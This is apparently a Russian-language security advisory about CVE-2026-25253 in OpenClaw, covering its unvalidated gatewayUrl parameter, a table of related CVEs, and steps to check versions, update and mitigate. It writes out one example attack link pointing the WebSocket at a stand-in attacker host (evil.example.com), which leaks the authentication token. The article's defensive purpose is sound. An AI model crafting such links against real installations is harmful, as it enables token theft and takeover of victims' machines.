Что произошло: CVE-2026-25253 в OpenClaw
18 марта 2026 года исследователи зафиксировали, что более 12 800 экземпляров OpenClaw по-прежнему уязвимы к атаке, описанной в CVE-2026-25253, — несмотря на то что патч вышел ещё в конце января. Эта уязвимость получила оценку CVSS 8.8 и считается наиболее опасной из раскрытых в начале 2026 года.
Суть проблемы: Control UI OpenClaw принимал параметр gatewayUrl напрямую из query-строки URL — без какой-либо валидации. Злоумышленник мог сформировать ссылку вида:
http://localhost:3000/?gatewayUrl=ws://evil.example.com/wsОдин клик по такой ссылке — и WebSocket-соединение OpenClaw переадресовывалось на сервер атакующего. В момент установки соединения передавался токен аутентификации. Итог: полный контроль над машиной жертвы без какого-либо взаимодействия пользователя, кроме перехода по ссылке.
Уязвимость обнаружили и описали специалисты SonicWall, runZero и Immersive Labs; материал получил широкое освещение на Dark Reading.
Таблица CVE в OpenClaw 2026 года
Патч версии 2026.1.29 закрыл сразу несколько критических проблем. В 2026 году было зафиксировано более 100 CVE для OpenClaw; ниже — наиболее серьёзные из известных на дату публикации:
| CVE | CVSS | Описание |
|---|---|---|
| CVE-2026-25253 | 8.8 | Перехват WebSocket через неvalидированный gatewayUrl |
| CVE-2026-24763 | 8.8 | Инъекция команд в Docker sandbox через небезопасную обработку PATH |
| CVE-2026-28466 | 9.4 | Критическая уязвимость (детали раскрыты частично) |
| CVE-2026-28474 | 9.3 | Критическая уязвимость |
| CVE-2026-28391 | 9.2 | Критическая уязвимость |
| CVE-2026-28446 | 9.2 | Критическая уязвимость |
Полный трекер CVE доступен на GitHub: jgamblin/OpenClawCVEs.
Обратите внимание: CVE-2026-24763 (CVSS 8.8) закрывалась тем же патчем 2026.1.29 и связана с небезопасной обработкой переменной PATH в Docker-окружении — злоумышленник мог выполнить произвольные команды внутри sandbox.
Как проверить версию OpenClaw
Шаг 1. Найдите текущую версию
Откройте интерфейс OpenClaw, перейдите в Settings → About или выполните в терминале:
openclaw --versionЕсли вы используете Docker-образ, проверьте тег запущенного контейнера:
docker ps --format "table {{.Image}}\t{{.Names}}"Шаг 2. Сравните с безопасным релизом
Минимально безопасная версия — 2026.1.29. Если у вас более ранний релиз — система уязвима к CVE-2026-25253 и CVE-2026-24763.
Шаг 3. Обновите OpenClaw
Способ обновления зависит от метода установки:
Установка через Desktop App: Откройте меню → Check for Updates. Либо скачайте актуальный релиз с официального сайта OpenClaw.
Установка через npm:
npm update -g openclawDocker:
docker pull openclaw/openclaw:latest
docker compose down && docker compose up -dПодробнее об установке — в материале Установка OpenClaw на Windows и руководстве Первый запуск OpenClaw.
Временные меры до обновления
Если немедленное обновление невозможно, примите следующие меры:
- Не переходите по ссылкам, содержащим параметр
gatewayUrlв URL OpenClaw-интерфейса. - Ограничьте доступ к порту Control UI на уровне файрвола — разрешите только
127.0.0.1. - Отключите удалённый доступ к интерфейсу, если он не нужен.
- Проверьте активные сессии и при подозрении на компрометацию немедленно отозвите токены.
Также рекомендуем изучить общие вопросы прав доступа в статье Разрешения и доступ в OpenClaw.
Почему 12 800 экземпляров остались непропатченными
По данным мониторинга от 18 марта 2026, через полтора месяца после выхода патча уязвимы оставались тысячи инсталляций. Причины типичны:
- Автообновления отключены или работают нестабильно.
- Инсталляции через Docker не обновляются без явной команды
pull. - Часть пользователей не отслеживает бюллетени безопасности OpenClaw.
- Корпоративные окружения требуют тестирования перед обновлением.
Ситуацию усугубляет то, что OpenClaw по умолчанию открывает интерфейс на внешний адрес — подробнее об этом риске читайте в разделе Приватность и локальный запуск.
Вывод
CVE-2026-25253 — наглядный пример атаки с минимальным порогом входа: жертве достаточно перейти по ссылке. Обновление до версии 2026.1.29 устраняет эту угрозу, однако общий ландшафт CVE в OpenClaw в 2026 году остаётся напряжённым — четыре уязвимости с CVSS 9.0+ зафиксированы только за первый квартал.
Включите автообновления, следите за трекером jgamblin/OpenClawCVEs и настройте сетевую изоляцию согласно рекомендациям из статьи Разрешения и доступ в OpenClaw.